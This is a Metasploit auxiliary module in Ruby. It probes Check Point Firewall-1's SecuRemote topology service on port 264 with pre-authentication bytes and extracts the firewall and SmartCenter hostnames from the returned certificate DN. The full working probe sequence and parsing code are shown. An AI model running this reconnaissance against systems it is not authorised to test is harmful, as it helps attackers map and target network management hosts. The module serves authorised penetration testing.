Path: blob/master/modules/auxiliary/gather/checkpoint_hostname.rb
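##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  # Bytes written to the topology service before anything else. The module
  # author did not document what the individual bytes mean; they are kept
  # exactly as in the original probe and sent as two separate writes, in order.
  PROBE_HEADER = "\x51\x00\x00\x00".freeze
  PROBE_TRAILER = "\x00\x00\x00\x21".freeze

  # Four-byte reply that the module treats as "this is a Check Point box".
  EXPECTED_BANNER = "Y\x00\x00\x00".freeze

  # Pre-authentication request: a 4-byte big-endian length (0x0b = 11) followed
  # by the NUL-terminated string "securemote".
  SECUREMOTE_REQUEST = "\x00\x00\x00\x0bsecuremote\x00".freeze

  # Pulls the CN (firewall host) and O (SmartCenter host) out of the DN the
  # service returns. Both groups are greedy, so on a DN containing several
  # dots the O= capture runs up to the LAST dot -- TODO(review): confirm against
  # a real ICA DN before tightening this to a lazy `.+?`.
  DN_PATTERN = /CN=(.+),O=(.+)\./i

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
        'Description' => %q{
          This module sends a query to the port 264/TCP on CheckPoint Firewall-1
          firewalls to obtain the firewall name and management station
          (such as SmartCenter) name via a pre-authentication request. The string
          returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
          host. Whilst considered "public" information, the majority of installations
          use detailed hostnames which may aid an attacker in focusing on compromising
          the SmartCenter host, or useful for government, intelligence and military
          networks where the hostname reveals the physical location and rack number
          of the device, which may be unintentionally published to the world.
        },
        'Author' => [ 'aushack' ],
        'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
        'References' => [
          # aushack - None? Stumbled across, probably an old bug/feature but unsure.
          [ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
          [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
        ],
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(264),
      ]
    )
  end

  # Opt out of the framework's autofilter (automatic module matching); the
  # module is meant to be pointed at a host explicitly.
  def autofilter
    false
  end

  # Talk to the topology service on RHOST:RPORT, print whatever hostnames the
  # DN reveals, and record them in the database.
  #
  # The socket is released in an `ensure` block so that a peer that drops the
  # connection mid-exchange (raising out of `put`/`get_once`) does not leave
  # the connection open for the remainder of the module's life.
  #
  # @return [void]
  def run
    print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
    fw_hostname = nil
    sc_hostname = nil

    begin
      connect

      sock.put(PROBE_HEADER)
      sock.put(PROBE_TRAILER)
      # A short or absent read simply fails the equality check below.
      res = sock.get_once(4)

      if res == EXPECTED_BANNER
        print_good("Appears to be a CheckPoint Firewall...")
        sock.put(SECUREMOTE_REQUEST)
        # Unbounded read: whatever the peer sends back in the next chunk. If the
        # DN straddles a read boundary the regex will not match and nothing is
        # reported -- acceptable for a best-effort probe.
        res = sock.get_once
        match = res && res.match(DN_PATTERN)

        if match
          # NOTE(review): these values come verbatim from an untrusted peer and
          # are echoed to the console and stored in the DB without filtering;
          # strip non-printable bytes if a hostile endpoint is a concern.
          fw_hostname = match[1]
          sc_hostname = match[2]
          print_good("Firewall Host: #{fw_hostname}")
          print_good("SmartCenter Host: #{sc_hostname}")
        end
      else
        print_error("Unexpected response: '#{res.inspect}'")
      end
    ensure
      disconnect
    end

    report_info(fw_hostname, sc_hostname)
  end

  # Record the host and its securemote service in the database.
  #
  # Only reports when a firewall hostname was actually parsed: a reply that
  # merely started with the expected banner is not, on its own, treated as
  # proof that the target is what we think it is.
  #
  # @param fw_hostname [String, nil] CN captured from the topology response
  # @param sc_hostname [String, nil] O captured from the topology response
  # @return [void]
  def report_info(fw_hostname, sc_hostname)
    return unless fw_hostname

    host_info = {
      host: datastore['RHOST'],
      os_name: "Checkpoint Firewall-1",
      purpose: "firewall",
      name: fw_hostname
    }
    host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
    report_host(host_info)

    report_service(
      host: datastore['RHOST'],
      port: datastore['RPORT'],
      proto: "tcp",
      name: "securemote"
    )
  end
end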